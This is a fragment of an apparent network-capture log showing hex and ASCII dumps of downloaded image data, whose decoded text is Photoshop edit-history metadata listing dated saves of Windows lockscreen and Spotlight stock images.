                                                                                                                                                                                    2023-01-05 07:58:10 UTC3005INData Raw: 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 38 2d 30 34 54 31 36 3a 31 39 3a 31 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 57 69 6e 31 30 2d 55 70 67 72 61 64 65 5c 42 72 61 6e 64 41 70 70 72 6f 76 65 64 5c 43 72 6f 70 73 5c 57 69 6e 64 6f 77 73 50 72 6f 5f 47 65 74 74 79 49 6d 61
                                                                                                                                                                                    Data Ascii: pData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Lockscreen_1920x1080_Landscape001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2016-08-04T16:19:19-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Win10-Upgrade\BrandApproved\Crops\WindowsPro_GettyIma
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3029INData Raw: 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 36 2d 30 39 2d 32 36 54 31 30 3a 31 31 3a 35 33 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 46 61 6c 6c 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 46 61 6c 6c 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 37 38 38 36 33 30 32 31 5f 31 39 32 30 78 31 30 38 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 39 2d 32 36 54 31 30 3a 31 33 3a 30 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 46 61 6c 6c 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 46 61 6c
                                                                                                                                                                                    Data Ascii: cape.psd opened&#xA;2016-09-26T10:11:53-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\FallEntertainment\FallEntertainment_GettyImages-478863021_1920x1080.psd saved&#xA;2016-09-26T10:13:02-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\FallEntertainment\Fal
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3045INData Raw: 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 31 36 54 31 33 3a 32 37 3a 32 36 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 48 6f 6c 69 64 61 79 5c 5f 43 48 4f 53 45 4e 5c 4d 49 54 2d 48 6f 6c 69 64 61 79 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 33 31 30 30 39 35 36 37 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d
                                                                                                                                                                                    Data Ascii: .5\AutoRecover\_Lockscreen_1920x1080_Landscape001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2016-11-16T13:27:26-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\Holiday\_CHOSEN\MIT-Holiday_GettyImages-631009567_1920x1080.jpg saved&#xA;2016-11-
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3061INData Raw: 36 39 30 37 36 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 32 33 54 31 35 3a 35 30 3a 32 36 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4f 66 66 69 63 65 5c 4f 66 66 69 63 65 2d 42 61 74 63 68 32 5c 5f 43 48 4f 53 45 4e 2d 53 77 61 79 5c 43 72 6f 70 73 5c 4f 66 66 69 63 65 5f 53 77 61 79 2d 47 65 6e 65 72 69 63 5f 73 68 75 74 74 65 72 73 74 6f 63 6b 5f 33 34 36 31 38 39 31 34 35 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 32 33 54 31 35 3a 35 31 3a 31 37 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68
                                                                                                                                                                                    Data Ascii: 69076_1920x1080.jpg saved&#xA;2016-11-23T15:50:26-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Office\Office-Batch2\_CHOSEN-Sway\Crops\Office_Sway-Generic_shutterstock_346189145_1920x1080.jpg saved&#xA;2016-11-23T15:51:17-08:00&#x9;File C:\Users\v-lizagh
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3450INData Raw: 73 5c 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 2d 47 65 6e 65 72 61 6c 5c 4d 6f 76 69 65 73 5c 43 48 4f 53 45 4e 5c 45 64 67 65 2d 4d 53 52 65 77 61 72 64 73 2d 4d 6f 76 69 65 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 38 34 34 39 33 38 37 32 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 31 2d 33 30 54 31 34 3a 33 37 3a 35 32 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 31 2d 33 31 54 30 38 3a 35 39 3a 30 33 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63
                                                                                                                                                                                    Data Ascii: s\Entertainment-General\Movies\CHOSEN\Edge-MSRewards-Movies_GettyImages-584493872_1920x1080.jpg saved&#xA;2017-01-30T14:37:52-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2017-01-31T08:59:03-08:00&#x9;File Loc
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3587INData Raw: 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 30 36 54 31 33 3a 32 35 3a 33 32 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 43 6f 72 74 61 6e 61 2d 53 70 6f 74 6c 69 67 68 74 5f 35 30 30 70 78 2d 31 33 38 36 32 33 31 30 35 5f 31 39 32 30 78 31 30 38 30 33 44 33 37 30 33 41 43 43 31 31 39 31 44 33 41 31 31 31 43 37 30 44 33 43 39 33 44 35 45 41 46 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 30 36 54 31 33 3a 33 37 3a 30 35 2d 30 38 3a 30 30 26 23 78 39 3b 46 69
                                                                                                                                                                                    Data Ascii: 1080.jpg saved&#xA;2017-03-06T13:25:32-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Cortana-Spotlight_500px-138623105_1920x10803D3703ACC1191D3A111C70D3C93D5EAF.psb saved&#xA;2017-03-06T13:37:05-08:00&#x9;Fi
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3617INData Raw: 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 57 69 6e 64 6f 77 73 5c 53 65 72 76 69 63 69 6e 67 5c 43 48 4f 53 45 4e 5c 52 6f 75 6e 64 31 5c 57 69 6e 64 6f 77 73 53 65 72 76 69 63 69 6e 67 5f 35 30 30 70 78 2d 39 39 37 35 35 31 35 39 5f 31 39 32 30 78 31 30 38 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 32 37 54 31 32 3a 30 33 3a 33 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 57 69 6e 64 6f 77 73 5c 53 65 72 76 69 63 69 6e 67 5c 43 48 4f 53 45 4e 5c 52 6f 75 6e 64 31 5c 57 69 6e 64 6f 77 73 53 65 72 76 69 63 69 6e 67 5f 35 30 30 70 78 2d 39 39 37 35 35 31 35 39 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67
                                                                                                                                                                                    Data Ascii: s\v-lizagh\MS\Windows10\Windows\Servicing\CHOSEN\Round1\WindowsServicing_500px-99755159_1920x1080.psd saved&#xA;2017-03-27T12:03:36-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Windows\Servicing\CHOSEN\Round1\WindowsServicing_500px-99755159_1920x1080.jpg
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3729INData Raw: 70 65 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 34 2d 32 30 54 31 39 3a 34 39 3a 30 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 34 2d 32 34 54 31 30 3a 33 39 3a 32 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 30 34 2d 32 34 54 31 30 3a
                                                                                                                                                                                    Data Ascii: pe001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2017-04-20T19:49:02-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2017-04-24T10:39:26-07:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;2017-04-24T10:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3785INData Raw: 3a 31 37 3a 32 33 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 32 54 31 36 3a 31 38 3a 32 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39
                                                                                                                                                                                    Data Ascii: :17:23-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_Lockscreen_1920x1080_Landscape001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2017-05-12T16:18:29-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_19
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3816INData Raw: 30 33 39 38 46 45 43 30 34 34 33 31 46 30 31 39 46 33 39 34 33 36 39 44 34 34 44 35 37 43 46 43 37 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 36 2d 30 36 54 31 33 3a 30 37 3a 31 30 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 36 2d 30 37 54 30 38 3a 32 33 3a 35 33 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 30 36 2d 30 37 54 30 38 3a 33
                                                                                                                                                                                    Data Ascii: 0398FEC04431F019F394369D44D57CFC7.psb saved&#xA;2017-06-06T13:07:10-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2017-06-07T08:23:53-07:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;2017-06-07T08:3
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4214INData Raw: 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 57 69 6e 64 6f 77 73 5c 54 69 70 73 5c 43 68 6f 73 65 6e 5c 57 69 6e 64 6f 77 73 31 30 2d 54 69 70 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 37 35 36 30 35 38 31 31 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 37 2d 31 33 54 31 38 3a 35 32 3a 30 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 57 69 6e 64 6f 77 73 31 30 2d 54 69 70 73 5f
                                                                                                                                                                                    Data Ascii: -07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Windows\Tips\Chosen\Windows10-Tips_GettyImages-675605811_1920x1080.jpg saved&#xA;2017-07-13T18:52:07-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_Windows10-Tips_
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4406INData Raw: 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 55 53 2d 4f 70 65 6e 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4d 49 54 2d 55 53 6f 70 65 6e 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 34 37 32 36 37 31 37 32 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 31 30 54 31 37 3a 35 30 3a 33 33 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4d 49 54 2d 55 53 6f 70 65 6e 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 34 37 32 36 37 31 37 32 5f 31 39 32 30 78 31 30 38 30 44 38 32 43 33 45 42 44 46 30 38
                                                                                                                                                                                    Data Ascii: mentsInTime\US-Open\Chosen\Crops\MIT-USopen_GettyImages-147267172_1920x1080.jpg saved&#xA;2017-08-10T17:50:33-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_MIT-USopen_GettyImages-147267172_1920x1080D82C3EBDF08
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4414INData Raw: 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 43 6f 72 74 61 6e 61 5c 41 63 71 75 69 73 69 74 69 6f 6e 73 52 65 6d 69 6e 64 65 72 73 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 41 63 71 52 65 6d 69 6e 64 65 72 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 30 37 32 37 37 33 39 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 32 39 54 31 36 3a 30 33 3a 31 31 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 43 6f 72 74 61 6e 61 5c 41 63 71 75 69 73 69 74 69 6f 6e 73 52 65 6d 69 6e 64 65 72 73 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 41 63 71 52 65 6d 69 6e 64 65 72 73 5f 47 65 74 74 79 49 6d 61 67
                                                                                                                                                                                    Data Ascii: v-lizagh\MS\Windows10\Cortana\AcquisitionsReminders\Chosen\Crops\AcqReminders_GettyImages-170727739_1920x1080.jpg saved&#xA;2017-08-29T16:03:11-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Cortana\AcquisitionsReminders\Chosen\Crops\AcqReminders_GettyImag
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4492INData Raw: 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 31 33 54 31 38 3a 31 33 3a 32 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 31 37 54 31 30 3a 33 31 3a 33 33 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 31 37 54 31 30 3a 33 36 3a 35 38 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c
                                                                                                                                                                                    Data Ascii: saved&#xA;2017-10-13T18:13:26-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2017-10-17T10:31:33-07:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;2017-10-17T10:36:58-07:00&#x9;File C:\Users\v-lizagh\
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4508INData Raw: 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 31 2d 32 30 54 31 31 3a 32 39 3a 30 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 42 6c 61 63 6b 46 72 69 64 61 79 43 68 72 69 73 74 6d 61 73 53 68 6f 70 70 69 6e 67 5c 43
                                                                                                                                                                                    Data Ascii: v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_Lockscreen_1920x1080_Landscape001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2017-11-20T11:29:08-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\BlackFridayChristmasShopping\C
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5196INData Raw: 34 3a 30 32 3a 35 35 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 30 37 54 31 32 3a 31 37 3a 32 37 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 30 37 54 31 32 3a 34 30 3a 33 32 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 53 72 65 77 61 72 64 73
                                                                                                                                                                                    Data Ascii: 4:02:55-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2017-12-07T12:17:27-08:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;2017-12-07T12:40:32-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MSrewards
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5212INData Raw: 5c 4e 42 41 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4d 49 54 2d 4e 42 41 2d 49 6e 74 6c 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 35 33 30 38 30 39 32 32 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 31 2d 30 39 54 30 38 3a 32 39 3a 30 33 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4d 49 54 2d 4e 42 41 2d 49 6e 74 6c 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 34 37 32 37 31 30 37 32 5f 31 39 32 30 78 31 30 38 30 36 36 35 33 41 30 44 46 43 41 32 30 37 35 37 36 35 32 42 42 44 44
                                                                                                                                                                                    Data Ascii: \NBA\Chosen\Crops\MIT-NBA-Intl_GettyImages-653080922_1920x1080.jpg saved&#xA;2018-01-09T08:29:03-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_MIT-NBA-Intl_GettyImages-147271072_1920x10806653A0DFCA20757652BBDD
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5228INData Raw: 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 30 38 54 31 34 3a 33 31 3a 34 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 5f 5f 54 65 6d 70 6c 61 74 65 73 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 31 32 54 31 36 3a 34 30 3a 30 35 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 31 32 54 31 36 3a 34 39 3a 34 32 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c
                                                                                                                                                                                    Data Ascii: sb saved&#xA;2018-02-08T14:31:48-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\__Templates\Lockscreen_1920x1080_Landscape.psd saved&#xA;2018-02-12T16:40:05-08:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;2018-02-12T16:49:42-08:00&#x9;File C:\
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5236INData Raw: 69 6e 64 6f 77 73 5c 4d 69 78 65 64 52 65 61 6c 69 74 79 5c 46 59 31 38 43 61 6d 70 61 69 67 6e 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 57 4d 52 2d 48 4d 44 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 36 33 30 31 30 30 33 35 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 32 38 54 31 30 3a 31 37 3a 34 37 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 57 69 6e 64 6f 77 73 5c 4d 69 78 65 64 52 65 61 6c 69 74 79 5c 46 59 31 38 43 61 6d 70 61 69 67 6e 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 57 4d 52 2d 48 4d 44 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 39 31 37 38 32 31 33 33 5f 31 39 32 30 78 31 30 38 30 2e 6a 70
